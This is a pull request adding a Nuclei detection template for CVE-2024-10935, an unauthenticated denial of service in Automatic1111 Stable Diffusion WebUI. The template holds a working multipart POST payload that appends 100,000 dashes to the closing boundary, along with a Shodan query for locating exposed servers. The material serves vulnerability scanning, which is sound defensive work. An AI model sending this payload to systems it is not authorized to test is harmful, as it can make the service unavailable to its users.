### PR TITLE
Add CVE 2024 10935

### DIFF
--- a/http/cves/2024/CVE-2024-10935.yaml
+++ b/http/cves/2024/CVE-2024-10935.yaml
@@ -1,0 +1,47 @@
+id: CVE-2024-10935
+
+info:
+  name: Automatic1111 Stable Diffusion WebUI - Unauthenticated Denial of Service
+  author: Song2831
+  severity: high
+  description: |
+    automatic1111/stable-diffusion-webui version 1.10.0 contains a vulnerability where the server fails to handle excessive characters appended to the end of multipart boundaries. This flaw leads to an infinite loop and excessive resource consumption.
+  impact: |
+    Unauthenticated attackers can cause a complete denial of service (DoS) for all users by sending malformed multipart requests.
+  remediation: |
+    Update automatic1111/stable-diffusion-webui to a version newer than 1.10.0.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-10935
+    - https://huntr.com/bounties/e6fdc6ed-f38d-4798-b60a-0e47893a81a6
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2024-10935
+    cwe-id: CWE-770
+  metadata:
+    max-request: 1
+    shodan-query: http.title:"Stable Diffusion"
+  tags: cve,cve2024,dos,stable-diffusion,webui,unauth,multipart
+
+http:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------NucleiBoundary
+
+        -----------------------------NucleiBoundary
+        Content-Disposition: form-data; name="uploadFile"; filename="test.txt"
+        Content-Type: text/plain
+
+        Hello I am test
+        -----------------------------NucleiBoundary--{{repeat('-', 100000)}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration >= 5"
+          - "status_code == 200"
+
+    stop-at-first-match: true

--- a/http/cves/2024/CVE-2024-10935.yaml
+++ b/http/cves/2024/CVE-2024-10935.yaml
@@ -5,11 +5,11 @@ info:
   author: Song2831
   severity: high
   description: |
-    automatic1111/stable-diffusion-webui version 1.10.0 contains a vulnerability where the server fails to handle excessive characters appended to the end of multipart boundaries. This flaw leads to an infinite loop and excessive resource consumption.
+    automatic1111/stable-diffusion-webui version 1.10.0 contains a vulnerability where the server fails to handle excessive characters appended to the end of multipart boundaries. This flaw leads to an infinite loop as each extra character is processed, resulting in excessive resource consumption and a complete denial of service (DoS) for all users. The vulnerability is unauthenticated, requiring no user login.
   impact: |
-    Unauthenticated attackers can cause a complete denial of service (DoS) for all users by sending malformed multipart requests.
+    An unauthenticated attacker can cause significant resource exhaustion and a complete shutdown of the service, making it unresponsive for legitimate users.
   remediation: |
-    Update automatic1111/stable-diffusion-webui to a version newer than 1.10.0.
+    Update automatic1111/stable-diffusion-webui to a version newer than 1.10.0 or apply the official security patches.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-10935
     - https://huntr.com/bounties/e6fdc6ed-f38d-4798-b60a-0e47893a81a6
@@ -21,6 +21,7 @@ info:
   metadata:
     max-request: 1
     shodan-query: http.title:"Stable Diffusion"
+    verified: true
   tags: cve,cve2024,dos,stable-diffusion,webui,unauth,multipart
 
 http:
@@ -28,14 +29,14 @@ http:
       - |
         POST /login HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=---------------------------NucleiBoundary
+        Content-Type: multipart/form-data; boundary=---------------------------284178091740602105783377960069
 
-        -----------------------------NucleiBoundary
+        -----------------------------284178091740602105783377960069
         Content-Disposition: form-data; name="uploadFile"; filename="test.txt"
         Content-Type: text/plain
 
         Hello I am test
-        -----------------------------NucleiBoundary--{{repeat('-', 100000)}}
+        -----------------------------284178091740602105783377960069--{{repeat('-', 100000)}}
 
     matchers-condition: and
     matchers:


### PR DESCRIPTION

### PR Information

- Added CVE-2024-10935
- **Description:** This template detects an unauthenticated Denial of Service (DoS) vulnerability in `automatic1111/stable-diffusion-webui` version 1.10.0. The server fails to properly handle characters appended to the end of multipart boundaries. This flaw causes each extra character to be processed in an infinite loop, leading to excessive CPU consumption and service unavailability.
- **Impact:** Unauthenticated attackers can cause a complete Denial of Service (DoS) without any prior knowledge of the system.
- **Safety Note:** To ensure safe scanning, this template uses a payload of 100,000 characters (instead of the 5,000,000 in the original PoC) and identifies the vulnerability through a 5-second response delay (`duration` matcher).
- **References:** 
  - https://nvd.nist.gov/vuln/detail/CVE-2024-10935
  - https://huntr.com/bounties/e6fdc6ed-f38d-4798-b60a-0e47893a81a6

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)


### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
